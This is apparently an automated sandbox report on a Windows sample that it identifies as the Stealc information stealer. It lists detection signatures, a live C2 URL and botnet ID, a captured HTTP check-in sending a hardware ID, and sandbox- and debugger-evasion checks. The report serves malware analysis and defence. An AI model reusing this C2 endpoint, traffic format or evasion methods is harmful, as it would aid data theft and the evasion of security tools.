Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538061
MD5:ad1b355860fd1ac789fef08c2723416e
SHA1:b8c30d3b010012c818d1f104118c4f8b511dad41
SHA256:42f5eafd03f379e54bc398fb2f502393b381aa1a58068cbcd65ae8d9f5263beb
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2888 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AD1B355860FD1AC789FEF08C2723416E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2888JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2888JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.870000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-20T07:40:06.730405+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.870000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php~Virustotal: Detection: 19%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php&Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/lVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpjVirustotal: Detection: 20%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0087C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00879AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00877240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00879B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00879B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00888EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00888EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00884910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0087DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0087E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0087ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00884570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F68A FindFirstFileA,0_2_0087F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00883EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00883EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0087F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0087DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0087BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a Data Ascii: ------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="hwid"D867EC00AEAF281263175------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="build"doma------JJKJDAEBFCBKECBGDBFC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00874880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a Data Ascii: ------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="hwid"D867EC00AEAF281263175------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="build"doma------JJKJDAEBFCBKECBGDBFC--
                Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
                Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
                Source: file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
                Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/l

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF0880_2_00AEF088
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC28FF0_2_00CC28FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C0_2_00C4406C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C318070_2_00C31807
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C40AA40_2_00C40AA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7A7D0_2_00BD7A7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1627F0_2_00B1627F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3B850_2_00BF3B85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B00BF20_2_00B00BF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C383230_2_00C38323
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2E4240_2_00C2E424
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B67C470_2_00B67C47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2FDCB0_2_00C2FDCB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD6DF50_2_00BD6DF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAED380_2_00BAED38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BD760_2_00C3BD76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C34E9B0_2_00C34E9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B656D10_2_00B656D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C39E6F0_2_00C39E6F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D55FA80_2_00D55FA8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008745C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qmfnotwd ZLIB complexity 0.9949935645063598
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00888680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00888680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00883720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00883720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\AFE25WAF.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1846784 > 1048576
                Source: file.exeStatic PE information: Raw size of qmfnotwd is bigger than: 0x100000 < 0x19cc00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qmfnotwd:EW;bvdxcoxs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qmfnotwd:EW;bvdxcoxs:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00889860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cd797 should be: 0x1cbefb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qmfnotwd
                Source: file.exeStatic PE information: section name: bvdxcoxs
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D160DA push esi; mov dword ptr [esp], 348A9A21h0_2_00D1619A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8C0 push ebp; mov dword ptr [esp], ebx0_2_00CDA8CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF088 push 1116EA05h; mov dword ptr [esp], eax0_2_00AEF0B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF088 push ecx; mov dword ptr [esp], eax0_2_00AEF101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF088 push esi; mov dword ptr [esp], ebx0_2_00AEF11E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC28FF push 40E986EAh; mov dword ptr [esp], eax0_2_00CC29A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D14884 push edi; mov dword ptr [esp], esi0_2_00D148C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D14884 push edx; mov dword ptr [esp], eax0_2_00D148FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D14884 push edx; mov dword ptr [esp], 59892145h0_2_00D1490E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D14884 push 1CEB38AEh; mov dword ptr [esp], eax0_2_00D149A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD88C5 push ecx; mov dword ptr [esp], 7BEA3018h0_2_00AD8C13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB20B9 push 6C2E2848h; mov dword ptr [esp], ecx0_2_00CB20C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C56066 push esi; mov dword ptr [esp], eax0_2_00C56494
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C56066 push ebp; mov dword ptr [esp], 0D2EE97Eh0_2_00C56899
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C56066 push eax; mov dword ptr [esp], 457280B0h0_2_00C568A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C56066 push ecx; mov dword ptr [esp], 2F61F942h0_2_00C568AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 2DE1A301h; mov dword ptr [esp], ebp0_2_00C44087
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push eax; mov dword ptr [esp], esi0_2_00C4408B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push esi; mov dword ptr [esp], 72786533h0_2_00C440EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 4D660B35h; mov dword ptr [esp], edi0_2_00C44142
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 7419BFA9h; mov dword ptr [esp], ebp0_2_00C44157
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 32D12C99h; mov dword ptr [esp], edi0_2_00C44389
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 19B0A8E0h; mov dword ptr [esp], ebp0_2_00C44497
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 332E7277h; mov dword ptr [esp], ebp0_2_00C444A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push ebx; mov dword ptr [esp], ecx0_2_00C4453A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push edx; mov dword ptr [esp], eax0_2_00C4453E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 57501884h; mov dword ptr [esp], edx0_2_00C4459B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push 438ECED9h; mov dword ptr [esp], ecx0_2_00C445AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push esi; mov dword ptr [esp], eax0_2_00C44632
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push esi; mov dword ptr [esp], ebx0_2_00C44697
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4406C push eax; mov dword ptr [esp], esi0_2_00C446C1
                Source: file.exeStatic PE information: section name: qmfnotwd entropy: 7.953945835356761

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00889860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13414
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD225F second address: AD2263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2263 second address: AD1B83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D3020h], ecx 0x00000010 push dword ptr [ebp+122D0A8Dh] 0x00000016 jnp 00007F996107E1C5h 0x0000001c jmp 00007F996107E1BFh 0x00000021 call dword ptr [ebp+122D187Dh] 0x00000027 pushad 0x00000028 or dword ptr [ebp+122D25BFh], esi 0x0000002e xor dword ptr [ebp+122D25BFh], ebx 0x00000034 xor eax, eax 0x00000036 jmp 00007F996107E1BDh 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f stc 0x00000040 mov dword ptr [ebp+122D2B2Fh], eax 0x00000046 sub dword ptr [ebp+122D1C2Ch], ebx 0x0000004c add dword ptr [ebp+122D3020h], edx 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D25BFh], esi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jmp 00007F996107E1BCh 0x00000066 lodsw 0x00000068 cld 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d je 00007F996107E1B7h 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 clc 0x00000079 push eax 0x0000007a pushad 0x0000007b pushad 0x0000007c jmp 00007F996107E1C7h 0x00000081 jp 00007F996107E1B6h 0x00000087 popad 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492E2 second address: C492E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
